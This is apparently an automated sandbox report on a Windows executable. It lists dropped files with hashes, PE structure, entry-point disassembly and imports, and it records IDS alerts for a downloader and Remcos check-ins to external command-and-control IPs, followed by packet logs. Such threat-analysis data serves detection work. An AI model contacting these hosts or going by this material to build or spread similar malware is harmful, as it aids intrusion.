SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 78853 |
Entropy (8bit): | 1.2455837622809836 |
Encrypted: | false |
SSDEEP: | 384:3xbi0gBtJQNRoJSzCkwEtgPy35L11XkHfhbW+gi9XXtdj+3IPEk3RewnMpvVGukp:3xbirBtJQN6JR+3t11XkZKU9XPELtkp |
MD5: | 824141132C7447FD5FEFE32B734E91EE |
SHA1: | 84631EE3FEE81D126E8129AB3E837DB105912176 |
SHA-256: | 8C86022F0ED34AA823A873EEA842DB85411C0A5FFC75E9A0B3F9F045471FA838 |
SHA-512: | EE4BAEEC6921AB62DA9BAFD5C75276117736F8741F74936E4CEE9CFA18F47BE0D6777B3D3F9269A2E3383AAFF858B4513B69A1007E5E11B1AEB8FCEFE651440D |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54283 |
Entropy (8bit): | 5.361679605378956 |
Encrypted: | false |
SSDEEP: | 1536:oh9f0RLFjL+EcdjZ1vLuUX6o+tGsxj4wiInD8DeFW:ohIdC5ki6HqELW |
MD5: | B8754D46031D79E381032DC495738F37 |
SHA1: | C1DFA31255DC6D514D03A4A78DFEFC38AC79F291 |
SHA-256: | 0AA4DFFDFDF131923B9559FADBF0CBC382C60AF309C4E075151FD73828BA631B |
SHA-512: | C7C30FD11D98B97371B0848134FF3A44758F8E3AB3E33BDA6DA18D0988A3DE56A30E80720B4C37E7878EDB672B43B7BDB2C3E0464ECA48F23A9C7F3493C8F396 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 384624 |
Entropy (8bit): | 1.248833521425474 |
Encrypted: | false |
SSDEEP: | 1536:W6cz0sUWiVbCEoc9wgvpThh7bVWBYRM1XQpOD:cIzpxHvphhVWBCw8OD |
MD5: | 9B6ACDA0C5F46046E385C0790128D0C2 |
SHA1: | 6BD58E2F72155950922FFC3C834569C4170A19CB |
SHA-256: | 0A8A0437AE28DB331634876CE10D4CD83282F8F157C88D4AC91BBFC7102AC727 |
SHA-512: | 028F16C856B926C9BAC6569F6EED0EE943CC9522B6301930DDC571E2314F11955D79FEA2B64DE3A332BC99A165A9FD81A97E2F216F3B5F5DBF19719159D2B142 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Klitoriser51.adm
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 129475 |
Entropy (8bit): | 1.2572241713566128 |
Encrypted: | false |
SSDEEP: | 768:8NDyIGIJQJn7z1buGQfGc5yItzeF6/57P6lkcjp1lhlOh/6fCT3:HJ7u9aVf0Jx3 |
MD5: | 438EC0B53BC58AFA50B6C67950DF66D3 |
SHA1: | 39BC09893AE86854F4A9204D5E75CF02A8B7E8FF |
SHA-256: | E89BFD83D25FD03FDBA5D94B3D2E7F3A06F3EEA6D538FD397EBAFF4252EAE941 |
SHA-512: | 195A2BDAA2F6D1B8C1E4B7ED5856D26818B8B142688EE33CB245084938F56D7E08930194D7CD15BCDE0BB8956CF0A15C34E05ADA06C25EEA98D6FC9250CB966B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Loquaciousness.Acc
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 313594 |
Entropy (8bit): | 7.718949917493243 |
Encrypted: | false |
SSDEEP: | 6144:dVhXa+OFcyNokRx6hV+eIskuCQvw8c1SE1lZkhyE3AAcYtK7CNxXf0f8DEWktAb0:RDkRxShL/usE1nyy+WCN2f9htAFHlRm |
MD5: | B94F573B2BD801105D4A2F06933D5770 |
SHA1: | FEEA08423EE946072A97F702B633623C605CA03D |
SHA-256: | 2CDB0341A8A218F53C689CB81512C87B11E71E56D2E4709EDBBCEB2A81B5D5C4 |
SHA-512: | C90549B027A0105D8376232C71E7897B6581079254B026748EC640D38CA165BEE1DB6FDD35702489A0555FC864A4887ADBD2B4C7A057B07D9913FF10CBC1296C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\gangsterfilmen.sky
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 209545 |
Entropy (8bit): | 1.2697940266141337 |
Encrypted: | false |
SSDEEP: | 768:GB9fz0i3eSF6qok2kiuGuccV7/BZWgd1LadtY5w7PJsQpEINlaiBVtM6F8+AXF6N:14sJhOhiKT6vV |
MD5: | AD805DD3CCD4E51E794B31FECB308E37 |
SHA1: | 60A468E13054100E7171AC9EBCFC6ACC11ECEFE4 |
SHA-256: | C23B6450A4D80F70F25449D74B945A1B889CAEDE1881359A1A4934AC2C947D0F |
SHA-512: | ECCCA66ED902438B2EC4B9AD16C0A0EBC6DD1287817714CD7B1C4222B2FE17746D167327AB445CEA38D6C15ECA66ADDE913698AFAD999C7D17CA67B037F7BC7F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 163471 |
Entropy (8bit): | 1.2547111118094014 |
Encrypted: | false |
SSDEEP: | 768:Xyj8YpMGWHC57RDcZ3RcixTn9scZB+eTEHlhv9T6j+XbGkO/1eu5qV5D0jB43:Xr+eZwITkqq29 |
MD5: | 76003043201C6410C1D4B56A1357B6DF |
SHA1: | 43BD7B9D6BFD3354C40358847994BA8B241F7252 |
SHA-256: | 387143B793C16EF84FF29AEF4D62E252ADCC59EADC3912800BF1118013392BFA |
SHA-512: | C180C254C16B7FF4D27D1823F49D8830A8E6FC24FC49366605433521FF10A7DB5A056A12C9576738973E8089813616FE899AE88F46CE10C4AB54E9C2DCDA5374 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 776478 |
Entropy (8bit): | 7.022322453988849 |
Encrypted: | false |
SSDEEP: | 12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM |
MD5: | 02F086FB54D58BF17B51564B34166F5E |
SHA1: | 6AD69C9BDAFB1A4CA5C0D15836B3E0ABDD0A1E62 |
SHA-256: | 2AC935868A1F972E5A036986147051402E1B656A5AC9AC4B8CA15252F14E15FD |
SHA-512: | D34CEB0A5835C88F3D10A3E2E31F0E91A71809C5C514A1D2573C5A126E51F5BD4EF1F4F41B166F468D2222B6D0ABF04871109A3450F039EB4A577B9067C02AFA |
Malicious: | true |
Antivirus: | |
Preview: |
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe:Zone.Identifier
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.022322453988849 |
TrID: | |
File name: | zR4aIjCuRs.exe |
File size: | 776'478 bytes |
MD5: | 02f086fb54d58bf17b51564b34166f5e |
SHA1: | 6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62 |
SHA256: | 2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd |
SHA512: | d34ceb0a5835c88f3d10a3e2e31f0e91a71809c5c514a1d2573c5a126e51f5bd4ef1f4f41b166f468d2222b6d0abf04871109a3450f039eb4a577b9067c02afa |
SSDEEP: | 12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM |
TLSH: | F9F412003AC0CC23DDA10A749DA7C7EA6B786E54AC05DB477704BF4E78773D36A1AA91 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h......... |
Icon Hash: | 5cf87c6c5d460252 |
Entrypoint: | 0x40338f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b34f154ec913d2d2c435cbd644e91687 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080A8h] |
call dword ptr [004080A4h] |
and eax, BFFFFFFFh |
cmp ax, 00000006h |
mov dword ptr [00434EECh], eax |
je 00007F86EC51FC63h |
push ebx |
call 00007F86EC522F15h |
cmp eax, ebx |
je 00007F86EC51FC59h |
push 00000C00h |
call eax |
mov esi, 004082B0h |
push esi |
call 00007F86EC522E8Fh |
push esi |
call dword ptr [00408150h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F86EC51FC3Ch |
push 0000000Ah |
call 00007F86EC522EE8h |
push 00000008h |
call 00007F86EC522EE1h |
push 00000006h |
mov dword ptr [00434EE4h], eax |
call 00007F86EC522ED5h |
cmp eax, ebx |
je 00007F86EC51FC61h |
push 0000001Eh |
call eax |
test eax, eax |
je 00007F86EC51FC59h |
or byte ptr [00434EEFh], 00000040h |
push ebp |
call dword ptr [00408044h] |
push ebx |
call dword ptr [004082A0h] |
mov dword ptr [00434FB8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
Programming Language: | |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x39180 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6627 | 0x6800 | 8c030dfed318c62753a7b0d60218279b | False | 0.6642503004807693 | data | 6.452235553722483 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2aff8 | 0x600 | 939516377e7577b622eb1ffdc4b5db4a | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x1d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x52000 | 0x39180 | 0x39200 | 2b4e1d509c996fc0835cd264198de9c9 | False | 0.33165942970459517 | data | 3.439269253351708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x524a8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1941470483851887 |
RT_ICON | 0x62cd0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.21788942610889217 |
RT_ICON | 0x6c178 | 0x7da9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9887780161024589 |
RT_ICON | 0x73f28 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.22041353383458648 |
RT_ICON | 0x7a710 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.22504621072088724 |
RT_ICON | 0x7fb98 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.22815304676428907 |
RT_ICON | 0x83dc0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.24553941908713692 |
RT_ICON | 0x86368 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.26852720450281425 |
RT_ICON | 0x87410 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.4341684434968017 |
RT_ICON | 0x882b8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.29713114754098363 |
RT_ICON | 0x88c40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.4453971119133574 |
RT_ICON | 0x894e8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.3824884792626728 |
RT_ICON | 0x89bb0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.24566473988439305 |
RT_ICON | 0x8a118 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837 |
RT_DIALOG | 0x8a580 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x8a6c8 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x8a7c8 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x8a8e8 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x8a9b0 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x8aa10 | 0xca | data | English | United States | 0.6633663366336634 |
RT_VERSION | 0x8aae0 | 0x274 | data | English | United States | 0.5222929936305732 |
RT_MANIFEST | 0x8ad58 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:04.196262+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | TCP |
2024-10-06T11:47:10.534594+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.11.20 | 49769 | 192.169.69.26 | 3980 | TCP |
2024-10-06T11:47:33.265040+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.11.20 | 49773 | 192.169.69.26 | 3980 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 6, 2024 11:47:03.316562891 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.316688061 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.317028999 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.342674017 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.342745066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.758506060 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.758790016 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.788209915 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.788296938 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.789587975 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.789776087 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.791614056 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.832364082 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196424961 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196645021 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.196736097 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196894884 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398116112 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398140907 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398263931 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398349047 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398403883 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398515940 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398680925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399157047 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399210930 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399408102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399409056 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399480104 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399518967 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399709940 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.600701094 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600740910 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600898027 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.600924969 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600944042 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601089001 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601758003 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.601793051 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.601912022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601989985 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.602016926 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.602133036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.602236032 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603197098 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603229046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603394032 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603415966 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603457928 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603646040 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801456928 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801498890 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801604033 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801681042 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801696062 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801839113 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802149057 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802185059 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802280903 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802280903 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802328110 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802377939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802390099 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802500963 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802566051 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802666903 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802699089 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802812099 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802851915 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802865982 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
